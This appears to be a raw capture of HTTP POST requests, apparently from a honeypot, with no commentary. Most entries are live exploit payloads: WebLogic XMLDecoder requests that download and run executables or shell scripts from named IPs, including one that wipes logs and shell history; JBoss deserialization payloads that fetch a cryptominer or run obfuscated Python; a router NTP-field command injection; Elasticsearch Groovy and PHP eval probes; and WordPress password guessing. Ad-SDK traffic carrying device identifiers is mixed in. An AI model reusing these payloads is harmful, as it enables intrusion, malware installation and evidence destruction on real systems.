RaVXk9/LYbd4CXoOW9rSkqDXc49Y+P9CkyHuCKc4AbiXZ7wdopnYkKdVeakPj5zkK/uRPziQJKjOTlYTIO8DEnC+IIBmh5Vhf8ZVYO3Hhf6ahN2Gr34JI8Ago/vtwa9ovZ5c9BHf45v0ocMXp2B8/RSGV+HZGSZ3/jJWq/2hZMH39sJ5dLp+q42Sp9Qlh9Vn8B7d0mYThfMwTD3YQpBlVZGO5kQsQEz++5/AkmM4U54SwyJdjW/jxL/TBi8IqaB1emI9Mcer4yd/yqdFHMHjRizMulGbkPNM1f/S2qAm0iRJDEySUgORLswqHSxi4XG92ivK9OrCdtMIvEOMn8Mfp8m6vFP4+PJ9KpR9Ioy8TMfrCnRNIB1bTtgQGeM9cPU2Z3rQBsZEG/kgQLJmpWttjVvmS38ovHtGaj2TmScNv6m6
POST http://t5.proxy-checks.com/favicon.ico HTTP/1.1
Host: t5.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /sdk HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Host: x.x.x.x:8080
Content-Length: 441
Connection: close
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=123!@#
POST http://check.proxyradar.com/azenv.php?auth=147369633295&a=PSCMN&i=2733905975&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂0B÷Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /invoker/readonly HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1625
Host: x.x.x.x:80
User-Agent: Python-urllib/1.17
¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•L memberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}
java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyîLfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±îL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;L iMethodNametLjava/lang/String;[ iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~uq~ur[Ljava.lang.String;≠“VÁÈ{Gxpt /bin/basht-ctpython -c "import base64;exec(base64.b64decode('aW1wb3J0IGJhc2U2NCx1cmxsaWIKZm9yIGkgaW4gcmFuZ2UoNSk6CiAgICB0cnk6CiAgICAgICAgZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCdodHRwOi8vay56c3c4LmNjL0FwaS8nKS5yZWFkKCkpKQogICAgICAgIGJyZWFrCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcw=='))"texecuq~vq~/srjava.util.HashMap⁄¡√`—F
loadFactorI thresholdxp?@wxxvrjava.lang.annotation.Retentionxpq~:
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970
{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":190,"SubmitData_time":505331,"FetchNextAd_time":2935170,"RepeatSubmitData_time":380819,"RenderAd_time":1611115,"TaskDispatchPostback_time":380919,"ad_session_start":1496230017843,"FetchNextAd_count":188,"RepeatFetchNextAd_time":646724,"cached_files_expired":66,"RepeatFetchNextAd_count":25,"RepeatSubmitData_count":21,"TaskDispatchPostback_count":40,"TaskCollectAdvertisingId_time":21556,"RenderAd_count":73,"SubmitData_count":36,"TaskCollectAdvertisingId_count":40}}
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 325
{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","networkOperator":"TELKOMSEL","volume":0.26666668,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106
{"start":1495362169077,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂ØmÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 848
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/wlanexts.exe');start C:/Windows/temp/wlanexts.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=111111
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å`äQ<Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149613607773&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&net=2&k=1 HTTP/1.1
Content-Length: 768
Host: cm.adkmob.com
Connection: Keep-Alive
Äë,_—úãd®3OÎ¥î(µ·K'7KÎô»á5ɶ¯i∏m[9ÃU`fl˛8≈™‡º∏Â~*øoM-∂ñÑ‘!+é˜S~¡≤«,[=>YŸ@Ï£@Aàvleíé`[ùPqÃD¢≤Á»◊ <4ObWò(ɛ嗶P\˜í‚"&Óœ{xõgB<|È-ÑRœÕ√Œ≤≈µãÒ“?˚MÎ÷¯™bØÆÛ ìaƒUÖaÚå#yÉs£øŒEÔé^ıÓ¥!z≥€ø:öµ®ø˙7á0.‰O∑M∆áE≤vÖ¿ëÖÈ£Oå˙≤hâc \"ç©≥‚MEùÁê:,cÕ≠|k&1&üÏΩdH{[3⁄q*aøœ``µd€s’EÈçñ˙f∂G˝≈?…4‹OHïáÕÓrÀπÿ‹sÀûb˘è3‘ƒ{ÑñkS’ËÄ»>ß’09ÿ}•=Û∫£j
]úhÁ ¨§ VΩfl≥ö«”€ñ∑gVF¡+˚+Ç˙c6≥u∏h˘%⁄“ZX˝≈/_⁄Â’°êB∑7@R1Û†/∂Â/_€—(æ∆˙Rˇb‹@ƒpDÆ~x†<fl˛í\™´Ds’2$ıÂ~; •í»_Ë˝=èSƒú≥>“!∞<®åÄ)–Q:x—0œ&Ç»OOñ“CÒ»-jуDÊ√|ˇÿ3hfl:ø;G¨Ÿ5l¿vºqˆÙáå◊O˘iæ—¥z@Ó–›z•o ù”ÚX?Æ(ú•´¡{=ıaè°‚‚π$˙ìâ¬ñO$ô¿»ˇ˛Æfl{íÓòF}ûÑ8¶˘z>WË∫í´r∆aßqÇL6Ôı≈ÓÙ-∏çEg√ë»4&Û…∂∏∆!u»k?‰Ï∑•øa4⁄<•Hdh`'™]Ñ˚s4«Ó¶Úìù≥â%uÒp‚¢k∑Á¶/Z[~U2§ Œ,'–PWoyÂÄ›0ú¥N◊Hc:Í6ø©éÊÀ*πœO\9‚•ôkj!â PÚÍB«è GÕGœìL€ñ
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
CFy3yXAVVgfWgC91sm3Ead8gQzm9HcT7SGkbBjcTvb0FtnX83jHVyyON6e5Hf1QXle4AJkzn2de5RN41N5witEU4XgK9P4BhiLydgOlSeoZZ0OOerdX9zqzQ0ntHUE/XhZzXTmwuo7MUxAbmH3FO/CIOQh6lFJgTqqrDTe4p71ey3tEG4DBIAo9GSmk4rAmOOo1fVsUdSydxCch7WYkkXaw8jF9KUXZYvAljksg+2Uc84PisTFkrkZTC1A3p1w9hxa20XQwXVY01WN9XkWZU67lobcTmR9oSj1RCY9FYgHKEianp97c985HgZEHSI8oPyO6AashgrgM9GK2znXvi6V5IUI0XnRz6saCYMwRlRr1PXKnnwgIbZLBzDBRn90MgO59oz3esKH0h2MUounU=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÖÖ§ŒÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl
POST /invoker/readonly HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 1564
¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•L memberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}
java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyîLfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±îL iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;L iMethodNametLjava/lang/String;[ iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;≠“VÁÈ{GxptΩpowershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://222.184.79.11:5317/minerxmr.exe', 'C:\\minerxmr.exe');START C:\\minerxmr.exetexecuq~q~#sq~srjava.lang.Integer‚†§˜Åá8Ivaluexrjava.lang.Numberܨï î‡ãxpsrjava.util.HashMap⁄¡√`—F
loadFactorI thresholdxp?@wxxvrjava.lang.Overridexpq~:
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=7654321
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://tech.lovelyskin.ru/proxyc/engine.php HTTP/1.0
Accept: */*
Referer: http://tech.lovelyskin.ru/proxyc/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: tech.lovelyskin.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache
xrumer=inside
POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache
